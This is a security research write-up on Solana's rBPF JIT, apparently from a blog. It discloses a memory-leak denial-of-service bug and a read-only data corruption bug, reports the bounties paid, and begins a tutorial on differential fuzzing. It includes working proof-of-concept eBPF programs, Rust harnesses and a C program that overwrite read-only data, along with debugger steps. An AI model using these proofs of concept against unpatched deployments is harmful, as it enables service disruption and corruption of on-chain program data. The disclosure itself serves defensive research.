The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.

The following eBPF program demonstrates the vulnerability:

entrypoint:
    goto +0
    r0 = 0
    call -1

where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.

The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.

While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.

Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.

Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.

For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k.
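The leak mechanism described in the report can be reproduced in miniature outside of rBPF. The following is a toy sketch under stated assumptions, not rBPF's code: `Tracked`, `VmError`, `leaky_path`, and `safe_path` are hypothetical names, and `std::ptr::write` stands in for JIT-emitted machine code that stores a new result over an old one without running the old value's destructor.

```rust
use std::ptr;
use std::sync::atomic::{AtomicUsize, Ordering};

/// Counts how many `Tracked` values have been dropped (hypothetical helper).
static DROPS: AtomicUsize = AtomicUsize::new(0);

/// A heap-allocated string that records when it is freed.
struct Tracked(String);

impl Drop for Tracked {
    fn drop(&mut self) {
        DROPS.fetch_add(1, Ordering::SeqCst);
    }
}

/// Toy stand-in for the VM's error type.
enum VmError {
    UnresolvedSymbol(Tracked),
    ExceededMaxInstructions,
}

/// Overwrites `slot` the way raw machine code would: the bytes are replaced,
/// but the old value's destructor never runs, so its heap data is leaked.
fn overwrite_without_drop(slot: &mut Result<u64, VmError>, new: Result<u64, VmError>) {
    unsafe { ptr::write(slot as *mut Result<u64, VmError>, new) };
}

/// Returns how many `Tracked` drops were observed during a raw overwrite.
fn leaky_path() -> usize {
    let before = DROPS.load(Ordering::SeqCst);
    let mut slot: Result<u64, VmError> =
        Err(VmError::UnresolvedSymbol(Tracked("Unknown".to_string())));
    overwrite_without_drop(&mut slot, Err(VmError::ExceededMaxInstructions));
    let dropped = DROPS.load(Ordering::SeqCst) - before;
    assert!(slot.is_err());
    dropped
}

/// Same sequence with an ordinary assignment, which drops the old value.
fn safe_path() -> usize {
    let before = DROPS.load(Ordering::SeqCst);
    let mut slot: Result<u64, VmError> =
        Err(VmError::UnresolvedSymbol(Tracked("Unknown".to_string())));
    assert!(slot.is_err());
    slot = Err(VmError::ExceededMaxInstructions);
    let dropped = DROPS.load(Ordering::SeqCst) - before;
    assert!(slot.is_err());
    dropped
}
```

In this sketch the raw overwrite observes no drop of the "Unknown" string, whereas the ordinary assignment observes exactly one. Leaking memory is not undefined behaviour in Rust, which is part of why this class of bug is easy to miss.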

Bug 2: Persistent .rodata corruption

The second bug I reported was easy to find, but difficult to diagnose. While the bug occurred with high frequency, it was unclear what exactly caused it. Past that, was it even exploitable or useful?

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
    or32 r9, -1
    mov32 r1, -1
    stxh [r9+0x1], r0
    exit

The crash type triggered was a difference in JIT vs interpreter exit state; JIT terminated with Ok(0), whereas interpreter terminated with:

Err(AccessViolation(31, Store, 4294967296, 2, "program"))

Spicy stuff. Looks like our JIT implementation has some form of out-of-bounds write. Let’s investigate a bit further.

The first thing of note is the access violation’s address: 4294967296. In other words, 0x100000000. Looking at the Solana documentation, we see that this address corresponds to program code. Are we writing to JIT’d code??

The answer, dear reader, is unfortunately no. As exciting as the prospect of arbitrary code execution might be, this actually refers to the BPF program code – more specifically, it refers to the read-only data present in the ELF provided. Regardless, it is writing to an immutable reference to a Vec somewhere that represents the program code, which is supposed to be read-only.
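To make the address arithmetic concrete, here is a minimal sketch of how a VM address maps to a region name. The four start addresses are assumptions based on my understanding of the `MM_*_START` constants in `solana_rbpf::ebpf` (only the program region at 0x100000000 is confirmed by the error above), and `region_name` is a hypothetical helper rather than anything in rBPF.

```rust
/// Assumed start addresses of the VM's memory regions. Only the program
/// start is confirmed by the access violation shown in the text.
const MM_PROGRAM_START: u64 = 0x1_0000_0000;
const MM_STACK_START: u64 = 0x2_0000_0000;
const MM_HEAP_START: u64 = 0x3_0000_0000;
const MM_INPUT_START: u64 = 0x4_0000_0000;

/// Hypothetical helper: names the region that a VM address falls into.
fn region_name(vm_addr: u64) -> &'static str {
    match vm_addr {
        a if a >= MM_INPUT_START => "input",
        a if a >= MM_HEAP_START => "heap",
        a if a >= MM_STACK_START => "stack",
        a if a >= MM_PROGRAM_START => "program",
        _ => "unmapped",
    }
}
```

With these assumed constants, `region_name(4294967296)` evaluates to "program", which agrees with the region named in the interpreter's AccessViolation.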

So why isn’t it?

The curse of x86

Let’s make our payload more clear and execute directly, then pop it into gdb to see exactly what code the JIT compiler is generating. I used the following program to test for OOB write:

oob-write.rs

This code likely no longer works due to changes in the rBPF API in recent releases. Try it in examples/ in v0.2.22, where the vulnerability is still present.

use std::collections::BTreeMap;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        Arch,
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
        Source,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();
}

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    code
        .load(MemSize::DoubleWord).set_dst(9).push()
        .load(MemSize::Word).set_imm(1).push()
        .store_x(MemSize::HalfWord).set_dst(9).set_off(0).set_src(0).push()
        .exit().push();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    dump_insns(&executable);
    let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);
    }
}

This just sets up and executes the following BPF assembly:

entrypoint:
    lddw r9, 0x100000000
    stxh [r9+0x0], r0
    exit

This assembly simply writes a 0 to 0x100000000.

For the next part: please, for the love of god, use GEF.

$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤  break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤  run
gef➤  print self.executable.ro_section.buf.ptr.pointer 
gef➤  awatch *$1 # break if we modify the readonly section
gef➤  record full # set up for reverse execution
gef➤  continue

After that last continue, we effectively execute until we hit the write access to our read-only section. Additionally, we can step backwards in the program until we find our faulty behaviour.

The watched memory is written to as a result of this X86 store instruction (as a reminder, this is the branch for stxh). Seeing this emit_address_translation call above it, we can determine that that function likely handles the address translation and readonly checks.

Further inspection shows that emit_address_translation actually emits a call to… something:

emit_call(jit, TARGET_PC_TRANSLATE_MEMORY_ADDRESS + len.trailing_zeros() as usize + 4 * (access_type as usize))?;

Okay, so this is some kind of global offset for this JIT program to translate the memory address. By searching for TARGET_PC_TRANSLATE_MEMORY_ADDRESS elsewhere in the program, we find a loop which initialises different kinds of memory translations.
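The offset arithmetic in that emit_call can be worked through by hand. The sketch below assumes that access sizes are 1, 2, 4, or 8 bytes and that the access type enum is numbered Load = 0 and Store = 1; both are my assumptions, and `translate_slot` is a hypothetical name for the part of the expression added to TARGET_PC_TRANSLATE_MEMORY_ADDRESS.

```rust
/// Assumed numbering of access types (Load = 0, Store = 1).
#[derive(Clone, Copy)]
enum AccessType {
    Load = 0,
    Store = 1,
}

/// Computes the slot added to the base target: the log2 of the access width
/// selects one of four entries, and the access type selects the group of four.
fn translate_slot(len: usize, access_type: AccessType) -> usize {
    assert!(matches!(len, 1 | 2 | 4 | 8), "unsupported access width");
    len.trailing_zeros() as usize + 4 * (access_type as usize)
}
```

Under these assumptions there are eight distinct slots, and the stxh in our payload (a two-byte store) lands in slot 5, which is consistent with a loop elsewhere initialising one translation routine per combination.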

Scrolling through this, we find our access check:

X86Instruction::cmp_immediate(OperandSize::S8, RAX, 0, Some(X86IndirectAccess::Offset(25))).emit(self)?; // region.is_writable == 0

Okay – so the x86 cmp instruction to find is one that uses a destination of [rax+0x19]. A couple of rsi (reverse-stepi) commands later, we find such an instruction:

cmp    DWORD PTR [rax+0x19], 0x0

Which is, notably, not using an 8-bit operand as the cmp_immediate call suggests. So what’s going on here?

x86 cmp operand size woes

Here is the definition of X86Instruction::cmp_immediate:

pub fn cmp_immediate(
    size: OperandSize,
    destination: u8,
    immediate: i64,
    indirect: Option<X86IndirectAccess>,
) -> Self {
    Self {
        size,
        opcode: 0x81,
        first_operand: RDI,
        second_operand: destination,
        immediate_size: OperandSize::S32,
        immediate,
        indirect,
        ..Self::default()
    }
}

This creates an x86 instruction with the opcode 0x81. Inspecting closer and cross-referencing with an x86-64 opcode reference, you can find that opcode 0x81 is only defined for 16-, 32-, and 64-bit register operands. If you want to use an 8-bit register operand, you’ll need to use the 0x80 opcode variant.

This is precisely the patch applied.
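To see why the operand size matters, consider the following sketch. It simulates both comparisons against a fake region image in which the is_writable byte at offset 25 (0x19) is zero but the three bytes after it hold leftover padding. The 32-byte image and all function names are hypothetical; the two encoders reflect the standard x86 encodings of `cmp r/m8, imm8` (0x80 /7) and `cmp r/m32, imm32` (0x81 /7) with a [rax+disp8] operand.

```rust
/// Offset of the is_writable flag, taken from the cmp in the text.
const IS_WRITABLE_OFFSET: usize = 25;

/// Builds a hypothetical 32-byte region image: is_writable is 0 (read-only)
/// and the three following padding bytes are filled with `padding`.
fn region_image(padding: u8) -> [u8; 32] {
    let mut image = [0u8; 32];
    for b in &mut image[IS_WRITABLE_OFFSET + 1..IS_WRITABLE_OFFSET + 4] {
        *b = padding;
    }
    image
}

/// What `cmp BYTE PTR [rax+off], 0` observes: a single byte.
fn is_zero_byte(mem: &[u8], off: usize) -> bool {
    mem[off] == 0
}

/// What `cmp DWORD PTR [rax+off], 0` observes: four bytes, padding included.
fn is_zero_dword(mem: &[u8], off: usize) -> bool {
    u32::from_le_bytes([mem[off], mem[off + 1], mem[off + 2], mem[off + 3]]) == 0
}

/// Encodes `cmp BYTE PTR [rax+disp], imm` (opcode 0x80, ModRM 0x78).
fn encode_cmp_byte(disp: i8, imm: i8) -> Vec<u8> {
    vec![0x80, 0x78, disp as u8, imm as u8]
}

/// Encodes `cmp DWORD PTR [rax+disp], imm` (opcode 0x81, ModRM 0x78).
fn encode_cmp_dword(disp: i8, imm: i32) -> Vec<u8> {
    let mut bytes = vec![0x81, 0x78, disp as u8];
    bytes.extend_from_slice(&imm.to_le_bytes());
    bytes
}
```

With non-zero padding, the byte comparison correctly reports a read-only region while the dword comparison does not. With zeroed padding the two agree, which would explain why the bug only showed up under some compiler configurations.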

A quick side note about testing code with different compilers

This bug actually was a bit weirder than it seems at first. Due to differences in Rust struct padding between versions, at the time that I reported the bug, the difference was spurious in stable release. As a result, it’s quite likely that no one would have noticed the bug until the next Rust release version.

From my report:

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

Proof of concept

Alright, now to create a PoC so that the people inspecting the bug can validate it. Like last time, we’ll create an ELF, along with a few different demonstrations of the effects of the bug. Specifically, we want to demonstrate that read-only values in the BPF target can be modified persistently, as our writes affect the executable and thus all future executions of the JIT program.

value_in_ro.c

This program should fail, as the data to be overwritten should be read-only. It will be executed by howdy.rs.

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}

howdy.rs

This program loads the compiled version of value_in_ro.c and attaches a log syscall so that we can see the behaviour internally. I confirmed that this syscall did not affect the runtime behaviour.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::{InstructionMeter, SyscallObject};

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

This program, when executed, has the following output:

howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!

These first two files demonstrate the ability to overwrite the readonly data present in binaries persistently. Notice that we actually execute the JIT’d code multiple times, yet our changes to the value in data are persistent.
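The shape of that output follows directly from where the write lands. As a toy model only (none of these names exist in rBPF, and the real bug writes through a supposedly immutable reference rather than a `&mut`), the sketch below keeps the read-only bytes inside a long-lived executable and runs the same "program" four times against it.

```rust
/// Toy stand-in for an executable whose read-only section outlives each run.
struct ToyExecutable {
    ro_section: Vec<u8>,
}

/// One "execution": log the data, perform the write that should have been
/// rejected, then log again. The write lands in the executable itself.
fn execute(exe: &mut ToyExecutable, log: &mut Vec<String>) {
    log.push(String::from_utf8_lossy(&exe.ro_section).into_owned());
    exe.ro_section.copy_from_slice(b"evil!");
    log.push(String::from_utf8_lossy(&exe.ro_section).into_owned());
}

/// Runs the toy program four times against the same executable.
fn run_four_times() -> Vec<String> {
    let mut exe = ToyExecutable {
        ro_section: b"howdy".to_vec(),
    };
    let mut log = Vec::new();
    for _ in 0..4 {
        execute(&mut exe, &mut log);
    }
    log
}
```

The log contains "howdy" once followed by "evil!" seven times, mirroring the output above: only the first execution ever sees the original data.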

Implications

Suppose that there was a faulty offset or a user-controlled offset present in a BPF-based on-chain program. A malicious user could modify the readonly data of the program to replace certain contexts. In the best case scenario, this might lead to DoS of the program. In the worst case, this could lead to the replacement of fund amounts, of wallet addresses, etc.

Reporting

Having assembled my proof-of-concepts, my implications, and so on, I sent in the following report to Solana on February 4th:

Report for bug 2 as submitted to Solana

An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.

value_in_ro.c (.so available upon request)

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}

analysis-corruption.rs

use std::collections::BTreeMap;

use solana_rbpf::elf::Executable;
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::insn_builder::BpfCode;
use solana_rbpf::insn_builder::Instruction;
use solana_rbpf::insn_builder::IntoBytes;
use solana_rbpf::insn_builder::MemSize;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", true).unwrap();
    let mut code = BpfCode::default();
    code
        .load(MemSize::DoubleWord).set_dst(0).set_imm(0).push()
        .load(MemSize::Word).set_imm(1).push()
        .store(MemSize::DoubleWord).set_dst(0).set_off(0).set_imm(0).push()
        .exit().push();
    let prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let jit_res = {
        let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
        let res = jit_vm.execute_program_jit(&mut jit_meter);
        let jit_tracer = jit_vm.get_tracer();
        let analysis = Analysis::from_executable(&executable);
        let stderr = std::io::stderr();
        jit_tracer.write(&mut stderr.lock(), &analysis).unwrap();
        res
    };
    eprintln!("{} => {:?}", 1, jit_res);
}

howdy.rs

use std::fs::File;
use std::io::Read;

use solana_rbpf::elf::Executable;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallObject;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

The bug was patched in a mere 4 hours.

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k. I disagreed strongly with this classification, but Solana said that due to the low likelihood of the exploitation of this bug (requiring a vulnerability in the on-chain program) they would offer $100k instead of the originally suggested $1m or $400k. They would not move on this point.

However, I would suggest that, if that was actually the basis for the bug classification, they should update their Security Policy to reflect it. It was obviously very disappointing to hear that they would not be offering the bounty I expected given the classification categories provided.

Okay, so what’d you do with the money??

It would be bad form of me to not explain the incredible flexibility shown by Solana in terms of how they handled my payout. I intended to donate the funds to the Texas A&M Cybersecurity Club, at which I gained a lot of the skills necessary to perform this research and these exploits, and Solana was very willing to sidestep their listed policy and donate the funds directly in USD rather than making me handle the tokens on my own, which would have dramatically affected how much I could have donated due to tax. So, despite my concerns regarding their policy, I was very pleased with their willingness to accommodate my wishes with the bounty payout.

secret club

Earn $200K by fuzzing for a weekend: Part 1

By: addison

11 May 2022 at 07:00

By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.

If you’re here just for the bug disclosures, see Part 2, though I encourage you all, even those who have not yet tried their hand at fuzzing, to read through this.

Exposition

A few friends and I ran a little Discord server (now a Matrix space) in which we discussed security and vulnerability research techniques. One of the things we have running in the server is a bot which posts every single CVE as they come out. And, yeah, I read a lot of them.

One day, the bot posted something that caught my eye:

This marks the beginning of our timeline: January 28th. I had noticed this CVE in particular for two reasons:

it was BPF, which I find to be an absurdly cool concept as it’s used in the Linux kernel (a JIT compiler in the kernel!!! what!!!)
it was a JIT compiler written in Rust

This CVE showed up almost immediately after I had developed some relatively intensive fuzzing for some of my own Rust software (specifically, a crate for verifying sokoban solutions where I had observed similar issues and thought “that looks familiar”).

Knowing what I had learned from my experience fuzzing my own software and that bugs in Rust programs could be quite easily found with the combo of cargo fuzz and arbitrary, I thought: “hey, why not?”.

The Target, and figuring out how to test it

Solana, as several of you likely know, “is a decentralized blockchain built to enable scalable, user-friendly apps for the world”. They are primarily known for their cryptocurrency, SOL, but the blockchain can also run really any form of smart contract.

rBPF in particular is a self-described “Rust virtual machine and JIT compiler for eBPF programs”. Notably, it implements both an interpreter and a JIT compiler for BPF programs. In other words: two different implementations of the same program, which should theoretically exhibit the same behaviour when executed.

I was lucky enough to both take a software testing course in university and to have been part of a research group doing fuzzing (admittedly, we were fuzzing hardware, not software, but the concepts translate). A concept that I had hung onto in particular is the idea of test oracles – a way to distinguish what is “correct” behaviour and what is not in a design under test.

In particular, something that stood out to me about the presence of both an interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect pseudo-oracle; as Wikipedia puts it:

a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.

Those of you who have more experience in fuzzing will recognise this concept as differential fuzzing, but I think we can often overlook that differential fuzzing is just another face of a pseudo-oracle.

In this particular case, we can execute the interpreter, one implementation of rBPF, and then execute the JIT compiled version, another implementation, with the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their outputs are different. If they are, one of them must necessarily be incorrect per the description of the rBPF crate: two implementations of exactly the same behaviour.
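As a minimal sketch of the idea, consider two implementations of a tiny, made-up instruction set. Everything here is hypothetical and unrelated to rBPF's actual API: `run_reference` plays the role of the interpreter, `run_optimised` plays the role of the JIT and contains a deliberate bug in how it handles oversized shifts, and `differential_check` is the pseudo-oracle.

```rust
/// A made-up instruction set operating on a single accumulator.
#[derive(Clone, Copy, Debug)]
enum Op {
    Add(u64),
    Mul(u64),
    Shl(u32),
}

/// Reference implementation: shift amounts wrap modulo 64.
fn run_reference(ops: &[Op]) -> u64 {
    ops.iter().fold(0u64, |acc, op| match *op {
        Op::Add(n) => acc.wrapping_add(n),
        Op::Mul(n) => acc.wrapping_mul(n),
        Op::Shl(n) => acc.wrapping_shl(n),
    })
}

/// Second implementation with a deliberate bug: shifts of 64 or more
/// produce 0 instead of wrapping.
fn run_optimised(ops: &[Op]) -> u64 {
    ops.iter().fold(0u64, |acc, op| match *op {
        Op::Add(n) => acc.wrapping_add(n),
        Op::Mul(n) => acc.wrapping_mul(n),
        Op::Shl(n) => acc.checked_shl(n).unwrap_or(0),
    })
}

/// The pseudo-oracle: run both on the same input and report any disagreement
/// as (reference output, optimised output).
fn differential_check(ops: &[Op]) -> Result<u64, (u64, u64)> {
    let (expected, actual) = (run_reference(ops), run_optimised(ops));
    if expected == actual {
        Ok(expected)
    } else {
        Err((expected, actual))
    }
}
```

The check passes for ordinary programs such as `[Op::Add(1), Op::Shl(3)]` and reports a mismatch for `[Op::Add(1), Op::Shl(64)]`. Note that the oracle does not know which side is wrong, only that at least one of them is.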

Writing a fuzzer

To start off, let’s try to throw a bunch of inputs at it without really tuning to anything in particular. This allows us to sanity check that our basic fuzzing implementation actually works as we expect.

The dumb fuzzer

First, we need to figure out how to execute the interpreter. Thankfully, there are several examples of this readily available in a variety of tests. I referenced the test_interpreter_and_jit macro present in ubpf_execution.rs as the basis for how my so-called “dumb” fuzzer executes.

I’ve provided a sequence of components you can look at one chunk at a time before moving onto the whole fuzzer. Just click on the dropdowns to view the code relevant to that step. You don’t necessarily need to read them to understand the point of this post.

Step 1: Defining our inputs

We must define our inputs such that they’re actually useful for our fuzzer. Thankfully, arbitrary makes it near trivial to derive an input from raw bytes.

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

If you want to see the definition of ConfigTemplate, you can check it out in common.rs, but all you need to know is that its purpose is to test the interpreter under a variety of different execution configurations. Its details aren’t particularly important for understanding the fundamental bits of the fuzzer.

Step 2: Setting up the VM

Setting up the fuzz target and the VM comes next. This will allow us to not only execute our test, but later to actually check if the behaviour is correct.

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    // TODO in step 3
});

You can find the details of how fuzz_target works in the Rust Fuzz Book, which covers it in more detail than would be appropriate here.

Step 3: Executing our input and comparing output

In this step, we just execute the VM with our provided input. In future iterations, we’ll compare the output of interpreter vs JIT, but in this version, we’re just executing the interpreter to see if we can induce crashes.

fuzz_target!(|data: DumbFuzzData| {
    // see step 2 for this bit

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

I use black_box here but I’m not entirely convinced that it’s necessary. I added it to ensure that the result of the interpreted program’s execution isn’t simply discarded and thus the execution marked unnecessary, but I’m fairly certain it wouldn’t be regardless.

Note that we are not checking whether the execution failed here. If the BPF program fails: we don’t care! We only care if the VM crashes for any reason.
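The distinction between a failing program and a crashing VM can be sketched with a toy harness. The names below (`toy_vm`, `fuzz_one`, `crashes`) are hypothetical and the "VM" is a stand-in, not rBPF: an Err is a legitimate outcome that the harness discards, whereas a panic escapes the harness, which is what a fuzzer would record as a crash.

```rust
use std::panic;

/// Toy VM: an empty program is a legitimate error, while opcode 0xFF
/// triggers a bug in the VM itself.
fn toy_vm(prog: &[u8]) -> Result<u64, String> {
    match prog.first().copied() {
        None => Err("empty program".to_string()),
        Some(0xFF) => panic!("VM bug: unhandled opcode 0xFF"),
        Some(b) => Ok(u64::from(b)),
    }
}

/// One fuzz iteration: the result, Ok or Err, is deliberately ignored.
fn fuzz_one(prog: &[u8]) {
    let _ = toy_vm(prog);
}

/// Helper for demonstration: reports whether an input makes the harness panic.
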